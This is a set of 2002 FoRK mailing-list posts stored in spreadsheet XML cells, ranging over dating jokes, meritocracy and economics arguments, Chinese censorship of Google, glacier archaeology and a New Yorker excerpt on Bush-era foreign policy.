    <t>On Mon, 23 Sep 2002, Russell Turpin wrote:--]Here's the better idea. Invite her for an afternoon
--]cruise under the Golden Gate bridge in your Stonehorse
--]day sailor.
Good way, heres one that worked for me.Work on a database project with that person. After a while hand her the
keyboard to go get some lunch.If when you come back she is talking to the person in the next cube about
survivor all the time you were gone...go for the one night boom boom planIf when you return she has read thru the help screen to try to figure out
what your working on...go fro the week long dine and do with options for
more IF she finishes the help docs and does some code.If when you come back she has done some  work on the db's infrastructure,
cleaned up your code and made a few  "additions" to make it work
better and figures that since you have done enough work for the day  asks
that you bring lunch and your lap top to the big  screen projection room
to watch your new DVD of startship troopers..marry her</t>
  </si>
  <si>
    <t xml:space="preserve">
Rare Virgin Shark Births Reported in Detroit
Voice of America - 5 hours ago
A female shark has become a single mother - in the strictest sense of the
term. Officials at Detroit's Belle Isle Aquarium say a shark there
recently produced three babies in an event they are calling virgin births.http://www.cnn.com/2002/US/Midwest/09/23/offbeat.shark.births.ap/
http://www.miami.com/mld/miamiherald/4124307.htm
http://www.startribune.com/stories/1451/3320433.html
</t>
  </si>
  <si>
    <t xml:space="preserve">First, misattribution.  I did not write the blurb below.  I made one
statement about VP Cheney only, to wit, that he has a short memory.I couldn't agree with you more on this: "in short, then, economics is not a
zero sum game, property is not theft, the rich don't get rich off the backs
of the poor, and redistributionist labor "theory" of value happy horseshit
is just that: horseshit, happy or otherwise," however, I resent being lumped
in a zero-sum-zealot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rich.WRT to meritocracies - all hail, meritocracies!  WRT Harvard: over 90% of
2002 graduates were cum laude +. INTERESTING curve.  Those eager to be
measured got their wish; those unwashed shy folk who just live it provide
the balast.Speaking of Forbes, was reading about Peter Norton just today in an old
issue while waiting for my doctor.  Norton attributes his success to LUCK.
Imagine.Geege-----Original Message-----
From: R. A. Hettinga [mailto:rah@shipwright.com]
Sent: Sunday, September 22, 2002 10:01 PM
To: Geege Schuman; Owen Byrne
Cc: Gary Lawrence Murphy; Mr. FoRK; fork@spamassassin.taint.org; Digital Bearer
Settlement List
Subject: Comrade Communism (was Re: Crony Capitalism (was RE: sed
/s/United States/Roman Empire/g))
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1At 11:15 AM -0400 on 9/22/02, Geege Schuman wrote:
&gt; Most of them seem to have Ivy League educations, or are Ivy League
&gt; dropouts suggesting to me that they weren't exactly poor to start
&gt; with.Actually, if I remember correctly from discussion of the list's
composition in Forbes about five or six years ago, the *best* way to
get on the Forbes 400 is to have *no* college at all. Can you say
"Bootstraps", boys and girls? I knew you could...[Given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possible.Why? Because, as of about 1950, the *best* way to get into Harvard,
for instance, is to be *smart*, not rich. Don't take my word for it,
ask their admissions office. Look at the admissions stats over the
years for proof.Meritocracy,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surpassing my own, should just plain know better. The
facts speak for themselves, if you just open your eyes and *look*.
There are no epicycles, the universe does not orbit the earth, and
economics is not a zero-sum game. The cost of anything, including
ignorance and destitution, is the forgone alternative, in this case,
intelligence and effort.[I will, however, admit to being educated *waay* past my level of
competence, and, by the way *you* discuss economics, so have you,
apparently.]BTW, if we ever actually *had* free markets in this country,
*including* the abolition of redistributive income and death taxes,
all those smart people in the Forbes 400 would have *more* money, and
there would be *more* self-made people on that list. In addition,
most of the people who *inherited* money on the list would have
*much* less of it, not even relatively speaking. Finally, practically
all of that "new" money would have come from economic efficiency and
not "stolen" from someone else, investment bubbles or not.That efficiency is called "progress", for those of you in The
People's Republics of Berkeley or Cambridge. It means more and better
stuff, cheaper, over time -- a terrible, petit-bourgeois concept
apparently not worthy of teaching by the educational elite, or you'd
know about it by now. In economic terms, it's also called an increase
in general welfare, and, no, Virginia, I'm not talking about
extorting money from someone who works, and giving it to someone who
doesn't in order to keep them from working and they can think of some
politician as Santa Claus come election time...
In short, then, economics is not a zero sum game, property is not
theft, the rich don't get rich off the backs of the poor, and
redistributionist labor "theory" of value happy horseshit is just
that: horseshit, happy or otherwise.To believe otherwise, is -- quite literally, given the time Marx
wrote Capital and the Manifesto -- romantic nonsense.Cheers,
RAH-----BEGIN PGP SIGNATURE-----
Version: PGP 7.5iQA/AwUBPY511cPxH8jf3ohaEQLAsgCfZhsQMSvUy6GqJ5wgL52DwZKpIhMAnRuR
YYboc+IcylP5TlKL58jpwEfu
=z877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</si>
  <si>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Good idea!This could also be a job for P2P; lots of people would love to
devote their spare cycles, bandwidth, and unblocked IP addresses
to giving the Chinese unfettered net access.In a sense, this is what the "peek-a-booty" project does:   http://www.peek-a-booty.orgBut let's play out the next few moves:Good Guys: Google enables SSL access
 Bad Guys: Chinese government again blocks all access to Google domains
Good Guys: Set up Google proxies on ever-changing set of hosts (peek-a-booty)
 Bad Guys: Ban SSL (or any unlicensed opaque traffic) at the national firewall
Good Guys: Hide Google traffic inside other innocuous-looking activity
 Bad Guys: Require nationwide installation of client-side NetNannyish
           software
Good Guys: Offer software which disables/spoofs monitoring software
 Bad Guys: Imprison and harvest organs from people found using
           monitoring-disabling-software...and on and on.The best we can hope is that technological cleverness, by raising the
costs of oppression or by provoking intolerable oppression, brings
social liberalization sooner rather than later.- Gordon----- Original Message -----
From: "Rohit Khare" 
To: 
Sent: Monday, September 23, 2002 2:44 PM
Subject: How about subsidizing SSL access to Google?
[a cheeky letter to the editors of the Economist follows, along with the
article I was commenting on... Rohit]In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project.On second thought, I can hardly imagine this Administration *promoting*
the use of encryption to uphold privacy rights. Never mind...Best,
   Rohit Khare===========================================================The search goes on
China backtracks on banning Googleâ€”up to a pointSep 19th 2002 | BEIJING
 From The Economist print editionIN CHINESE, the nickname for Google, an American Internet search engine,
is gougou, meaning â€œdoggyâ€. For the country's fast-growing population of
Internet users (46m, according to an official estimate), it is proving
an elusive creature. Earlier this month, the Chinese authorities blocked
access to Google from Internet service providers in Chinaâ€”apparently
because the search engine helped Chinese users to get access to
forbidden sites. Now, after an outcry from those users, access has been
restored.An unusual climbdown by China's zealous Internet censors? Hardly. More
sophisticated controls have now been imposed that make it difficult to
use Google to search for material deemed offensive to the government.
Access is still blocked to the cached versions of web pages taken by
Google as it trawls the Internet. These once provided a handy way for
Chinese users to see material stored on blocked websites.After the blocking of Google on August 31st, many Chinese Internet users
posted messages on bulletin boards in China protesting against the move.
Their anger was again aroused last week when some Chinese Internet
providers began rerouting users trying to reach the blocked Google site
to far less powerful search engines in China.Duncan Clark, the head of a Beijing-based technology consultancy firm,
BDA (China) Ltd, says China is trying a new tactic in its efforts to
censor the Internet. Until recently, it had focused on blocking
individual sites, including all pages stored on them. Now it seems to be
filtering data transmitted to or from foreign websites to search for key
words that might indicate undesirable content. For example earlier this
week when using Eastnet, a Beijing-based Internet provider, a search on
Google for Falun Gongâ€”a quasi-Buddhist exercise sect outlawed in Chinaâ€”
usually aborted before all the results had time to appear. Such a search
also rendered Google impossible to use for several minutes.</t>
  </si>
  <si>
    <t xml:space="preserve">Anyone who doesn't appreciate both PLUCK and LUCK is only looking at
part of the equation.America has, in fact, moved hard toward Meritocracy.  But -- and this is
a huge one -- you don't necessarily find it on the Forbes list.  There
is an element of LUCK, even if only being in the right place at the
right time, to go that high.Beyond the Forbes List, there are many ways in which almost pure LUCK is
involved in significant wealth.  Being a super-model, for example.
Though I think most people would be surprised by a lot of super-models.
Cindy Crawford was valedictorian of her high school.Most people, of course, aren't in those stratified realms.  It is the
rest of us who tend to sort.There is a huge philosophical problem with the concept of Merit in the
first place.  Rawls claims Merit doesn't exist.  Sowell seems to agree
at least in part, but I'm sure Sowell would also state that the benefits
of pretending it exists for society at large are enormous.And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school possible.
&gt; 
&gt; Why? Because, as of about 1950, the *best* way to get into Harvard,
&gt; for instance, is to be *smart*, not rich. Don't take my word for it,
&gt; ask their admissions office. Look at the admissions stats over the
&gt; years for proof.
&gt; 
&gt; Meritocracy, American Style, was *invented* at the Ivy League after
&gt; World War II. Even Stanford got the hint, :-), and, of course,
&gt; Chicago taught them all how, right? :-). Practically *nobody* who
&gt; goes to a top-20 American institution of higher learning can actually
&gt; afford to go there these days. Unless, of course, their parents, who
&gt; couldn't afford to go there themselves, got terminal degrees in the
&gt; last 40 years or so. And their kids *still* had to get the grades,
&gt; and "biased" (by intelligence :-)), test scores, to get in.
&gt; 
&gt; 
&gt; The bizarre irony is that almost all of those people with "terminal"
&gt; degrees, until they actually *own* something and *hire* people, or
&gt; learn to *make* something for a living all day on a profit and loss
&gt; basis, persist in the practically insane belief, like life after
&gt; death, that economics is some kind of zero sum game, that dumb people
&gt; who don't work hard for it make all the money, and, if someone *is*
&gt; smart, works hard, and is rich, then they stole their wealth somehow.
&gt; 
&gt; BTW, none of you guys out there holding the short end of this
&gt; rhetorical stick can blame *me* for the fact that I'm using it to
&gt; beat you severely all over your collective head and shoulders. You
&gt; were, apparently, too dumb to grab the right end. *I* went to
&gt; Missouri, and *I* don't have a degree in anything actually useful,
&gt; much less a "terminal" one, which means *I*'m broker than anyone on
&gt; this list -- it's just that *you*, of all people, lots with
&gt; educations far surpassing my own, should just plain know better. The
&gt; facts speak for themselves, if you just open your eyes and *look*.
&gt; There are no epicycles, the universe does not orbit the earth, and
&gt; economics is not a zero-sum game. The cost of anything, including
&gt; ignorance and destitution, is the forgone alternative, in this case,
&gt; intelligence and effort.
&gt; 
&gt; [I will, however, admit to being educated *waay* past my level of
&gt; competence, and, by the way *you* discuss economics, so have you,
&gt; apparently.]
&gt; 
&gt; 
&gt; 
&gt; BTW, if we ever actually *had* free markets in this country,
&gt; *including* the abolition of redistributive income and death taxes,
&gt; all those smart people in the Forbes 400 would have *more* money, and
&gt; there would be *more* self-made people on that list. In addition,
&gt; most of the people who *inherited* money on the list would have
&gt; *much* less of it, not even relatively speaking. Finally, practically
&gt; all of that "new" money would have come from economic efficiency and
&gt; not "stolen" from someone else, investment bubbles or not.
&gt; 
&gt; That efficiency is called "progress", for those of you in The
&gt; People's Republics of Berkeley or Cambridge. It means more and better
&gt; stuff, cheaper, over time -- a terrible, petit-bourgeois concept
&gt; apparently not worthy of teaching by the educational elite, or you'd
&gt; know about it by now. In economic terms, it's also called an increase
&gt; in general welfare, and, no, Virginia, I'm not talking about
&gt; extorting money from someone who works, and giving it to someone who
&gt; doesn't in order to keep them from working and they can think of some
&gt; politician as Santa Claus come election time...
&gt; 
&gt; 
&gt; In short, then, economics is not a zero sum game, property is not
&gt; theft, the rich don't get rich off the backs of the poor, and
&gt; redistributionist labor "theory" of value happy horseshit is just
&gt; that: horseshit, happy or otherwise.
&gt; 
&gt; To believe otherwise, is -- quite literally, given the time Marx
&gt; wrote Capital and the Manifesto -- romantic nonsense.
&gt; 
&gt; Cheers,
&gt; RAH
&gt; 
&gt; -----BEGIN PGP SIGNATURE-----
&gt; Version: PGP 7.5
&gt; 
&gt; iQA/AwUBPY511cPxH8jf3ohaEQLAsgCfZhsQMSvUy6GqJ5wgL52DwZKpIhMAnRuR
&gt; YYboc+IcylP5TlKL58jpwEfu
&gt; =z877
&gt; -----END PGP SIGNATURE-----
&gt; 
&gt; --
&gt; -----------------
&gt; R. A. Hettinga 
&gt; The Internet Bearer Underwriting Corporation 
&gt; 44 Farquhar Street, Boston, MA 02131 USA
&gt; "... however it may deserve respect for its usefulness and antiquity,
&gt; [predicting the end of the world] has not been found agreeable to
&gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
&gt; 
&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the link - I'm fascinated by archaeology as well.----- Original Message -----
From: "James Rogers" 
To: 
Sent: Monday, September 23, 2002 2:48 PM
Subject: Re: Goodbye Global Warming
I've seen articles on this type of stuff passing through various forums
for several years.  I've always found archaeology interesting for no
particular reason.  Here is a recent article from U.S. News that I
actually still have in the dank recesses of my virtual repository.-James Rogers
 jamesr@best.com
--------------------------------------------
http://www.usnews.com/usnews/issue/020916/misc/16meltdown.htmDefrosting the pastAncient human and animal remains are melting out of glaciers, a bounty
of a warming worldBY ALEX MARKELSAs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"Knapp brought the skull to the Denver Museum of Nature and Science,
where scientists last month announced that it was indeed from a
bisonâ€“one that died about 340 years ago. "This was an extraordinary
discovery," says Russ Graham, the museum's chief curator, adding that it
could alter notions of the mountain environment centuries ago. "There's
probably a lot more like it yet to be found."And not just bison. Colorado isn't the only place where glaciers and
snowfields are melting. Decades of unusual warmth in regions from Peru
to Alaskaâ€“a trend some think is linked to emissions from cars and
industryâ€“have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mountains.Vanishing act. The trick is finding such specimens before Mother
Natureâ€“and lootersâ€“take them first. Once uncovered, frozen remains can
deteriorate within hours or be gnawed by animals. Moreover, they're
often so well preserved when they emerge that people who come upon them
don't even realize they're ancient.That was the case when three men hunting sheep near a high glacier in
British Columbia, Canada, three years ago saw what they thought was a
dead animal. "It looked a little like sealskin buried in the ice,"
recalls Warren Ward, a teacher from nearby Nelson. "But when I looked
closer I could see leather fringe from a coat and finger bones."Figuring they had found the remains of another hunter, or perhaps a fur
trapper, the men stowed a flint knife and other artifacts in a Zip-Loc
bag and delivered them to local officials. Archaeologists later exhumed
the fallen hunter's body, along with a woven hat, fur clothing, and what
seemed to be a medicine bag. Carbon dating revealed that the hunter
lived about 550 years ago. Dubbed Kwaday Dan Ts'inchi, or Long Ago
Person Found, by people of the Champagne and Aishihik First Nations (who
may be his direct descendants), he is perhaps the best-preserved human
from the period ever found in North America.Other findings from melting ice in the neighboring Yukon region could
explain what that long-ago person was doing in the mountains in the
first place. "Before this there was no archaeological record of people
living here," says Greg Hare, a Yukon government archaeologist. "Now we
see that this area was very much part of people's seasonal activities."Like Ward's discovery, the search began by chance, when Kristin Benedek
caught a whiff of what smelled like a barnyard as she and her husband,
Gerry Kuzyk, hunted sheep at 6,000 feet in the mountains of the south
Yukon. They followed the scent to a melting patch of ice covered in
caribou dung. "It was really odd, because I knew there hadn't been
caribou in the area for at least 100 years," recalls Kuzyk, then a
wildlife biologist with the Yukon government.Caribou cake. Returning a week later, he found "what looked like a
pencil with string wrapped around it." It turned out to be a
4,300-year-old atlatl, or spear thrower. Further investigation of the
ice patchâ€“and scores of others around the regionâ€“revealed icy layer
cakes filled with caribou remains and human detritus chronicling 7,800
years of changing hunting practices.Scientists now believe ancient caribou and other animals flocked to the
ice each summer to cool down and escape swarming mosquitoes and flies.
Hunters followed the game. They returned for centuries and discarded
some equipment in the ice. "We've got people hunting with throwing darts
up until 1,200 years ago," says Hare, who now oversees the research
project. "Then we see the first appearance of the bow and arrow about
1,300 years ago. And by 1,200 years ago, there's no more throwing
darts."Now scientists are trying to make the search less a matter of luck. They
are developing sophisticated computer models that combine data on where
glaciers are melting fastest and where humans and animals are known to
have migrated to pinpoint the best places to search in Alaska's Wrangell
and St. Elias mountain rangesâ€“the United States' most glaciated
terrainâ€“and in the Andes. Johan Reinhard thinks the fast- thawing
European Alps could also deliver more findings, perhaps as exquisite as
the Ice Man. "Global warming is providing us high-altitude
archaeologists with some fantastic opportunities right now. We're
probably about the only ones happy about it."
</t>
  </si>
  <si>
    <t xml:space="preserve">Of the three lying politicians, which liar would you take?----- Original Message ----- 
From: "John Hall" 
To: "FoRK" 
Sent: Monday, September 23, 2002 2:23 PM
Subject: RE: Goodbye Global Warming
&gt; "I did not have sex with that woman."
&gt; 
&gt; &gt; -----Original Message-----
&gt; &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
&gt; Mr.
&gt; &gt; FoRK
&gt; &gt; Sent: Monday, September 23, 2002 2:12 PM
&gt; &gt; To: FoRK
&gt; &gt; Subject: Re: Goodbye Global Warming
&gt; &gt; 
&gt; &gt; 
&gt; &gt; ----- Original Message -----
&gt; &gt; From: "John Hall" 
&gt; &gt; 
&gt; &gt; &gt; A Green once said that if the Spotted Owl hadn't existed they
&gt; &gt; &gt; would have had to invent it.
&gt; &gt; A Republican once said "I am not a crook".
&gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">At 5:22 PM -0400 on 9/23/02, Tom wrote:
&gt; --]&gt; A Green once said that if the Spotted Owl hadn't existed they
&gt; --]&gt; would have had to invent it.
&gt; --]A Republican once said "I am not a crook".
&gt; --]
&gt;
&gt; Oh great, another round of Lableisms....Let me know when you get back to
&gt; real data..Not me. I have another one, instead:         Green = Red.;-).Cheers,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</si>
  <si>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At 2:57 PM -0700 on 9/23/02, Mr. FoRK wrote:
&gt; I just had a run-in with a neighbor whom I've never met before who
&gt; pigeonholed me within one minute after I asked a question - he said 'Are you
&gt; one of them environmentalists?' 
&gt;
&gt; Sheesh... I've been out of work too long...We'll ignore the possibility of a correlation here in the interest of
charity...Cheers,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</si>
  <si>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On Mon, 23 Sep 2002, Gordon Mohr wrote:
--]
--]The best we can hope is that technological cleverness, by raising the
--]costs of oppression or by provoking intolerable oppression, brings
--]social liberalization sooner rather than later.In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game.In this mad mad mad mad james burkian cum chucky darwin world there is no
rest for either the wicked or the nonwicked, there is just the ramp up to
the Brand New Jimmiez.the trick I think should all be learning is not so much looking for the
THE KILLER APP but instead to look for the "really cool app that mutates
to meet changes"Bascialy give china no choise but to shoot its own head off to stop the
music.bang bang ... have a nice day.-tom</t>
  </si>
  <si>
    <t xml:space="preserve">On Monday, September 23, 2002, at 03:25 PM, R. A. Hettinga wrote:&gt;          Green = Red.		Capitalist = Nazi.		Information content of the above statements === 0.Meanwhile, the angels of light (tm) are having a great knock-down 
drag-out with the eldrich kings of .NET on XML-DEV.-- whump
----
Bill Humphries 
http://www.whump.com/moreLikeThis/
</t>
  </si>
  <si>
    <t xml:space="preserve">Mr. FoRK:
&gt;Of the three lying politicians, which liar would you take?No, no. The riddle is, asking only one question, how
do you determine which is which? "If I were to ask
you whether he would say you were a crook, or if the
other had sex ..?"_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Monday, September 23, 2002, at 06:51 PM, Tom wrote:&gt; Bascialy give china no choise but to shoot its own head off to stop the
&gt; music.Or we could have the audacity to tell them to shape up or get cut out 
of the global marbles game. Unfortunately that model only seems to 
apply to despots with oil and WMDs, rather than despots with WMDs.-- whump
</t>
  </si>
  <si>
    <t xml:space="preserve">funny. i read it as green = red, as in accounting, as in fiscally
irresponsible.  which do you think is the worse indictment - overregulation
or overspending?  there are many (dickheads) who buy into the
neo-conservative media's (fox's) definiton of "liberal" as "one who seeks to
impose both."hannity and glove.best quote, wish i could remember who said it: "we tend to describe our own
party by its ideals and our opponents' party by its reality."geege-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Bill
Humphries
Sent: Monday, September 23, 2002 10:00 PM
To: fork@spamassassin.taint.org
Subject: Re: Goodbye Global Warming
On Monday, September 23, 2002, at 03:25 PM, R. A. Hettinga wrote:&gt;          Green = Red.		Capitalist = Nazi.		Information content of the above statements === 0.Meanwhile, the angels of light (tm) are having a great knock-down
drag-out with the eldrich kings of .NET on XML-DEV.-- whump
----
Bill Humphries 
http://www.whump.com/moreLikeThis/
</t>
  </si>
  <si>
    <t xml:space="preserve">At 5:29 PM -0700 on 9/23/02, John Hall wrote:
&gt; Rawls claims Merit doesn't exist.Nozick claims that Rawls doesn't exist.God says that Nozick is dead?:-).Cheers,
RAH
Quine, of course, read the Herald, not the Globe. With him and Nozick went
political "diversity" at Hahvahd...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</si>
  <si>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At 7:44 PM -0400 on 9/23/02, Geege Schuman wrote:
&gt; First, misattribution.My apologies. Rave on...Cheers,
RAH
"Where all the children are above average..."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</si>
  <si>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Depends on how much over spending vs. how much (and what type) over
regulation.The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housing.As for the definition of a liberal being someone who seeks to impose
both, I find no fault in that definition whatsoever.  The opinion that
EITHER we are spending too much OR we have too much regulation is pretty
much anathema to liberal politics.Finally, those who argue that there are private replacements for much
government regulation are not saying that a state of nature (no private
replacements, no government regulation) is better than government
regulation itself.And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
</t>
  </si>
  <si>
    <t xml:space="preserve">It's only 64kbps, but http://noise.ktru.org/ can be tasty.  Presently 
playing Fille Qui Mousse, Collage in Progress, and other happy nibbles.
Sounds a bit like The Avalanches, but that will change soon.Cheers,
Wayne
</t>
  </si>
  <si>
    <t>per john hall:
"The opinion that EITHER we are spending too much OR we have too much
regulation is pretty
much anathema to liberal politics."no it's not.geege</t>
  </si>
  <si>
    <t xml:space="preserve">from slate's "today's papers":  
The New York Times and Los Angeles Times both lead with word that
a federal judge ruled yesterday that the nation's largest
national gas pipeline company, El Paso, illegally withheld gas
from the market during California's energy squeeze in 2000-01.
The judge concluded that El Paso left 21 percent of its capacity
in the state off-line, thus driving up the price of gas and
helping to induce rolling blackouts. and this is the product of overregulation?-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John
Hall
Sent: Monday, September 23, 2002 11:57 PM
To: FoRK
Subject: liberal defnitions
Depends on how much over spending vs. how much (and what type) over
regulation.The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housing.As for the definition of a liberal being someone who seeks to impose
both, I find no fault in that definition whatsoever.  The opinion that
EITHER we are spending too much OR we have too much regulation is pretty
much anathema to liberal politics.Finally, those who argue that there are private replacements for much
government regulation are not saying that a state of nature (no private
replacements, no government regulation) is better than government
regulation itself.And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
</t>
  </si>
  <si>
    <t xml:space="preserve">
In a message dated 9/23/2002 6:30:31 PM, khare@alumni.caltech.edu writes:&gt; why you're writing with a double of scotch :-)because, obviously, after the inevitable second double, you won't remember 
anything you say unless you write it down :-)Tom
</t>
  </si>
  <si>
    <t>On Tue, 24 Sep 2002 ThosStew@aol.com wrote:--]Klez, most likely. It'll pick up your address and send mail to all your
--]friends, and your strangers, as if coming from you. Nice way to lose friends
--]and meet strangers. Better than typing gibberish (or Hemingway, but I repeat
--]myself) in a bar with a double of scotch.
Friends dont let friends use Outlook....even after a douly shot of the
scotch with a chaser.All hands on the stinky one.-tom(the other tommeat)</t>
  </si>
  <si>
    <t xml:space="preserve">This was just *too* funny.. rotflma.http://www.ozyandmillie.org/comics/om20020924.gif
-- 
#ken	P-)}Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
Author, developer, opinionist      http://Apache-Server.Com/"Millennium hand and shrimp!"
</t>
  </si>
  <si>
    <t>http://newyorker.com/fact/content/?020401fa_FACT1The New YorkerTHE NEXT WORLD ORDER
by NICHOLAS LEMANN
The Bush Administration may have a brand-new doctrine of power.
Issue of 2002-04-01
Posted 2002-03-25When there is a change of command-and not just in government-the new people
often persuade themselves that the old people were much worse than anyone
suspected. This feeling seems especially intense in the Bush
Administration, perhaps because Bill Clinton has been bracketed by a
father-son team. It's easy for people in the Administration to believe
that, after an unfortunate eight-year interlude, the Bush family has
resumed its governance-and about time, too.The Bush Administration's sense that the Clinton years were a waste, or
worse, is strongest in the realms of foreign policy and military affairs.
Republicans tend to regard Democrats as untrustworthy in defense and
foreign policy, anyway, in ways that coincide with what people think of as
Clinton's weak points: an eagerness to please, a lack of discipline.
Condoleezza Rice, Bush's national-security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President's father. They took office
last year, after what they regard as eight years of small-time flyswatting
by Clinton, thinking that they were picking up where they'd left off.Not long ago, I had lunch with-sorry!-a senior Administration
foreign-policy official, at a restaurant in Washington called the Oval
Room. Early in the lunch, he handed me a twenty-seven- page report, whose
cover bore the seal of the Department of Defense, an outline map of the
world, and these words:Defense Strategy for the 1990s:
The Regional Defense Strategy
Secretary of Defense
Dick Cheney
January 1993One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stakes-but what they do all day is go
to meetings and write memos and prepare briefings. How, possibly, to
explain that some of the documents, including the report that the senior
official handed me, which was physically indistinguishable from a
high-school term paper, represent the government version of playing
Carnegie Hall?After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 them, Paul Wolfowitz, the Deputy Secretary of
Defense; Lewis Libby, Cheney's chief of staff; and Eric Edelman, a senior
foreign-policy adviser to Cheney-generally speaking, a cohesive group of
conservatives who regard themselves as bigger-thinking, tougher-minded, and
intellectually bolder than most other people in Washington. (Donald
Rumsfeld, the Secretary of Defense, shares these characteristics, and has
been closely associated with Cheney for more than thirty years.) Colin
Powell, then the chairman of the Joint Chiefs of Staff, mounted a
competing, and presumably more ideologically moderate, effort to reimagine
American foreign policy and defense. A date was set-May 21, 1990-on which
each team would brief Cheney for an hour; Cheney would then brief President
Bush, after which Bush would make a foreign-policy address unveiling the
new grand strategy.Everybody worked for months on the "five-twenty-one brief," with a sense
that the shape of the post-Cold War world was at stake. When Wolfowitz and
Powell arrived at Cheney's office on May 21st, Wolfowitz went first, but
his briefing lasted far beyond the allotted hour, and Cheney (a hawk who,
perhaps, liked what he was hearing) did not call time on him. Powell didn't
get to present his alternate version of the future of the United States in
the world until a couple of weeks later. Cheney briefed President Bush,
using material mostly from Wolfowitz, and Bush prepared his major
foreign-policy address. But he delivered it on August 2, 1990, the day that
Iraq invaded Kuwait, so nobody noticed.The team kept working. In 1992, the Times got its hands on a version of the
material, and published a front-page story saying that the Pentagon
envisioned a future in which the United States could, and should, prevent
any other nation or alliance from becoming a great power. A few weeks of
controversy ensued about the Bush Administration's hawks being
"unilateral"-controversy that Cheney's people put an end to with denials
and the counter-leak of an edited, softer version of the same material.As it became apparent that Bush was going to lose to Clinton, the Cheney
team's efforts took on the quality of a parting shot. The report that the
senior official handed me at lunch had been issued only a few days before
Clinton took office. It is a somewhat bland, opaque document-a "scrubbed,"
meaning unclassified, version of something more candid-but it contained the
essential ideas of "shaping," rather than reacting to, the rest of the
world, and of preventing the rise of other superpowers. Its tone is one of
skepticism about diplomatic partnerships. A more forthright version of the
same ideas can be found in a short book titled "From Containment to Global
Leadership?," which Zalmay Khalilzad, who joined Cheney's team in 1991 and
is now special envoy to Afghanistan, published a couple of years into the
Clinton Administration, when he was out of government. It recommends that
the United States "preclude the rise of another global rival for the
indefinite future." Khalilzad writes, "It is a vital U.S. interest to
preclude such a development-i.e., to be willing to use force if necessary
for the purpose."When George W. Bush was campaigning for President, he and the people around
him didn't seem to be proposing a great doctrinal shift, along the lines of
the policy of containment of the Soviet Union's sphere of influence which
the United States maintained during the Cold War. In his first major
foreign-policy speech, delivered in November of 1999, Bush declared that "a
President must be a clear-eyed realist," a formulation that seems to
connote an absence of world-remaking ambition. "Realism" is exactly the
foreign-policy doctrine that Cheney's Pentagon team rejected, partly
because it posits the impossibility of any one country's ever dominating
world affairs for any length of time.One gets many reminders in Washington these days of how much the terrorist
attacks of September 11th have changed official foreign-policy thinking.
Any chief executive, of either party, would probably have done what Bush
has done so far-made war on the Taliban and Al Qaeda and enhanced domestic
security. It is only now, six months after the attacks, that we are truly
entering the realm of Presidential choice, and all indications are that
Bush is going to use September 11th as the occasion to launch a new,
aggressive American foreign policy that would represent a broad change in
direction rather than a specific war on terrorism. All his rhetoric,
especially in the two addresses he has given to joint sessions of Congress
since September 11th, and all the information about his state of mind which
his aides have leaked, indicate that he sees this as the nation's moment of
destiny-a perception that the people around him seem to be encouraging,
because it enhances Bush's stature and opens the way to more assertive
policymaking.Inside government, the reason September 11th appears to have been "a
transformative moment," as the senior official I had lunch with put it, is
not so much that it revealed the existence of a threat of which officials
had previously been unaware as that it drastically reduced the American
public's usual resistance to American military involvement overseas, at
least for a while. The Clinton Administration, beginning with the "Black
Hawk Down" operation in Mogadishu, during its first year, operated on the
conviction that Americans were highly averse to casualties; the all-bombing
Kosovo operation, in Clinton's next-to-last year, was the ideal foreign
military adventure. Now that the United States has been attacked, the
options are much broader. The senior official approvingly mentioned a 1999
study of casualty aversion by the Triangle Institute for Security Studies,
which argued that the "mass public" is much less casualty-averse than the
military or the civilian Ã©lite believes; for example, the study showed that
the public would tolerate thirty thousand deaths in a military operation to
prevent Iraq from acquiring weapons of mass destruction. (The American
death total in the Vietnam War was about fifty-eight thousand.) September
11th presumably reduced casualty aversion even further.Recently, I went to the White House to interview Condoleezza Rice. Rice's
Foreign Affairs article from 2000 begins with this declaration: "The United
States has found it exceedingly difficult to define its 'national interest'
in the absence of Soviet power." I asked her whether that is still the
case. "I think the difficulty has passed in defining a role," she said
immediately. "I think September 11th was one of those great earthquakes
that clarify and sharpen. Events are in much sharper relief." Like Bush,
she said that opposing terrorism and preventing the accumulation of weapons
of mass destruction "in the hands of irresponsible states" now define the
national interest. (The latter goal, by the way, is new-in Bush's speech to
Congress on September 20th, America's sole grand purpose was ending
terrorism.) We talked in her West Wing office; its tall windows face the
part of the White House grounds where television reporters do their
standups. In her bearing, Rice seemed less crisply military than she does
in public. She looked a little tired, but she was projecting a kind of
missionary calm, rather than belligerence.In the Foreign Affairs article, Rice came across as a classic realist,
putting forth "the notions of power politics, great powers, and power
balances" as the proper central concerns of the United States. Now she
sounded as if she had moved closer to the one-power idea that Cheney's
Pentagon team proposed ten years ago-or, at least, to the idea that the
other great powers are now in harmony with the United States, because of
the terrorist attacks, and can be induced to remain so. "Theoretically, the
realists would predict that when you have a great power like the United
States it would not be long before you had other great powers rising to
challenge it or trying to balance against it," Rice said. "And I think what
you're seeing is that there's at least a predilection this time to move to
productive and coÃ¶perative relations with the United States, rather than to
try to balance the United States. I actually think that statecraft matters
in how it all comes out. It's not all foreordained."Rice said that she had called together the senior staff people of the
National Security Council and asked them to think seriously about "how do
you capitalize on these opportunities" to fundamentally change American
doctrine, and the shape of the world, in the wake of September 11th. "I
really think this period is analogous to 1945 to 1947," she said-that is,
the period when the containment doctrine took shape-"in that the events so
clearly demonstrated that there is a big global threat, and that it's a big
global threat to a lot of countries that you would not have normally
thought of as being in the coalition. That has started shifting the
tectonic plates in international politics. And it's important to try to
seize on that and position American interests and institutions and all of
that before they harden again."The National Security Council is legally required to produce an annual
document called the National Security Strategy, stating the over-all goals
of American policy-another government report whose importance is great but
not obvious. The Bush Administration did not produce one last year, as the
Clinton Administration did not in its first year. Rice said that she is
working on the report now."There are two ways to handle this document," she told me. "One is to do it
in a kind of minimalist way and just get it out. But it's our view that,
since this is going to be the first one for the Bush Administration, it's
important. An awful lot has happened since we started this process, prior
to 9/11. I can't give you a certain date when it's going to be out, but I
would think sometime this spring. And it's important that it be a real
statement of what the Bush Administration sees as the strategic direction
